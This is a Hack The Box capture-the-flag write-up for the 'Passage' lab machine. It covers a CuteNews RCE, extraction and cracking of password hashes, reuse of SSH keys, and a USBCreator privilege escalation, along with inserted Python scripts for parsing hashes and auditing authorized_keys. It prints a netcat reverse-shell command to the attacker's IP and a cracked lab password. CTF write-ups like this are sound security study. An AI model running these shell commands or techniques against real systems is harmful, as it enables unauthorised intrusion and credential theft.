Passage ~ Hack The Box

Prerequisite


Just to make life easier, I usually add an entry to my hosts file so the target machine can be reached by name.

echo "10.10.10.206 passage.htb" >> /etc/hosts


Okay now onto the hacking!


Reconnaissance

As always, I started off with an Nmap scan against the machine.

┌──(root💀kali)-[/home/…/boxes/htb/machines/passage]
└─# nmap -Pn -sC -sV -oN initial passage.htb

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( nmap.org ) at 2021-02-11 18:36 EST
Nmap scan report for passage.htb (10.10.10.206)
Host is up (0.0056s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scanning & Enumeration

The scan showed that port 80 was running a web server. This was the web app being served:


There wasn't much on the page itself, except that it was run by CuteNews, so I took a look at the source code.


The source revealed a directory named CuteNews. Accessing that brought me to a login page.


The login page also let me identify the version of CuteNews that the web app was running.

A quick Google search revealed that there was an RCE exploit available for this version of CuteNews, including a PoC on GitHub by CRFSlick.

Exploitation

This exploit abused a profile-picture upload vulnerability that allowed users to run arbitrary code on the remote machine. The Python script I used automated all of these steps and gave a live remote shell.


Before running the exploit, I had to create an account on the website.


After that, I ran the exploit, which gave me a reverse shell on the box.


Now all that was left to do was to get a proper reverse shell back to my machine using bash / nc.


Remote Machine:
$> nc -e /bin/bash 10.10.14.47 666

Local Machine:
┌──(root💀kali)-[/home/…/boxes/htb/machines/passage]
└─# nc -lvp 666

Lateral Movement [Level 1]

After poking around for a while, I noticed that CuteNews stored hashes of user passwords in the cdata/users directory, so I decided to explore this. From the home directories I also knew there was a user named paul.


There were too many files for me to go through by hand, so I concatenated them all together and removed everything that was not a hash.


This made it easier to decode the base64 values, which I did with CyberChef.


Next, I grepped the file for the word paul to get his credential hash.


After I got the hash, I turned to CrackStation to quickly get it cracked.

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
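The concatenate / strip / base64-decode / grep steps above, written out as a small Python script. This is an added example, not code from the writeup or from CuteNews: the sample file is constructed here, its records are modelled on PHP serialize() output (an assumption about how CuteNews lays out cdata/users), and every name, e-mail and password in it is made up. The second function shows why a lookup service like CrackStation works on these hashes at all: they are bare SHA-256 with no salt and no stretching.

```python
import base64
import hashlib
import re

# Constructed sample (added example, not data from the box): one base64 line per
# record, in the style of PHP serialize() output. The storage format is an
# assumption about CuteNews; every value below is made up.
_DEMO_PASSWORD = "hunter2"
DEMO_HASH = hashlib.sha256(_DEMO_PASSWORD.encode()).hexdigest()
_RECORDS = [
    'a:1:{s:4:"name";a:1:{s:9:"paul-demo";a:3:{s:4:"name";s:9:"paul-demo";'
    's:5:"email";s:16:"paul@example.com";s:4:"pass";s:64:"' + DEMO_HASH + '";}}}',
    # an index record that carries no password hash at all
    'a:1:{s:5:"email";a:1:{s:16:"paul@example.com";s:9:"paul-demo";}}',
    'a:1:{s:4:"name";a:1:{s:10:"admin-demo";a:2:{s:4:"name";s:10:"admin-demo";'
    's:4:"pass";s:64:"' + hashlib.sha256(b"correct horse").hexdigest() + '";}}}',
]
SAMPLE_USERS_FILE = "<?php die('Direct call - access denied'); ?>\n" + "\n".join(
    base64.b64encode(r.encode()).decode() for r in _RECORDS
) + "\n"

NAME_RE = re.compile(r's:4:"name";s:\d+:"([^"]+)"')
PASS_RE = re.compile(r's:4:"pass";s:64:"([0-9a-f]{64})"')


def extract_hashes(text):
    """Decode every base64 line in the file and map username -> 64-hex SHA-256."""
    found = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("<?php"):
            continue
        try:
            decoded = base64.b64decode(line, validate=True).decode("utf-8", "replace")
        except ValueError:
            # not base64 (stray text, PHP guard lines): this is the
            # "remove everything that is not a hash" step from the writeup
            continue
        name, digest = NAME_RE.search(decoded), PASS_RE.search(decoded)
        if name and digest:
            found[name.group(1)] = digest.group(1)
    return found


def is_unsalted_sha256(candidate, digest_hex):
    """True when digest_hex is plain sha256(candidate): no salt, no stretching.
    That property is exactly what lets a precomputed lookup table reverse it."""
    return hashlib.sha256(candidate.encode()).hexdigest() == digest_hex


if __name__ == "__main__":
    for user, digest in extract_hashes(SAMPLE_USERS_FILE).items():
        print(f"{user}: {digest}")
```

Run it as-is and it prints the two constructed (user, hash) pairs; point `extract_hashes` at a real concatenated users file instead of `SAMPLE_USERS_FILE` to get the same output the manual CyberChef step produced. The fix on the application side is a salted, slow password hash (bcrypt, scrypt or Argon2), which makes the lookup-table approach useless.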


After getting the password atlanta1, I was able to retrieve the user flag from paul's account!


Lateral Movement [Level 2]

Looking at the .ssh directory showed that nadav@passage had access to Paul's account.


So I assumed that Paul would have the same access to nadav's account and tried to ssh in.


And... I was in nadav's account!
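The clue that made this step possible was a key comment in Paul's authorized_keys naming another account. The same observation is useful from the defender's side: a quick audit of authorized_keys files for keys that do not belong to the account owner. The script below is an added example, not part of the writeup; the sample file, the account names and the key blobs (placeholder text, not real keys) are all constructed, and it assumes that any options field in front of the key type contains no whitespace.

```python
# Constructed sample (added example, not from the box): an authorized_keys file
# in one user's home where keys for other accounts have been appended. Key blobs
# are placeholder text, not real key material.
SAMPLE_AUTHORIZED_KEYS = """\
# paul's own key
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC_PLACEHOLDER_KEY_1 paul@passage
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC_PLACEHOLDER_KEY_2 nadav@passage
command="/usr/bin/backup.sh",no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA_PLACEHOLDER_KEY_3 backup@passage
"""

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def parse_authorized_keys(text):
    """Return a list of (options, key_type, key_blob, comment) tuples.

    Assumption: an options field, if present, contains no whitespace (quoted
    spaces inside command="..." are not handled by this simple tokenizer)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, tok in enumerate(tokens) if tok in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue  # malformed line: no recognised key type or no key blob
        options = " ".join(tokens[:idx])
        comment = " ".join(tokens[idx + 2:])
        entries.append((options, tokens[idx], tokens[idx + 1], comment))
    return entries


def foreign_keys(text, owner):
    """Comments of keys whose user part (before '@') is not the account owner.

    The comment is free text, so this is only a hint (the same hint the
    writeup relied on); a thorough audit matches the key fingerprint against
    the other account's known keys rather than trusting the comment."""
    flagged = []
    for _options, key_type, _blob, comment in parse_authorized_keys(text):
        user = comment.split("@", 1)[0]
        if user != owner:
            flagged.append(comment if comment else f"<no comment> {key_type}")
    return flagged


if __name__ == "__main__":
    for entry in foreign_keys(SAMPLE_AUTHORIZED_KEYS, "paul"):
        print("key not owned by paul:", entry)
```

On the sample file this flags nadav@passage and backup@passage for the account paul; running `foreign_keys` over every `~user/.ssh/authorized_keys` on a host gives a map of which accounts can reach which, which is exactly the lateral path taken above.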

Privilege Escalation

As always, I ran LinPEAS, which told me that USBCreator on the machine was vulnerable and could be exploited!


A couple of Google searches later, I found a PoC with an explanation by Palo Alto Networks, which I used to exploit this vulnerability!


ROOTY!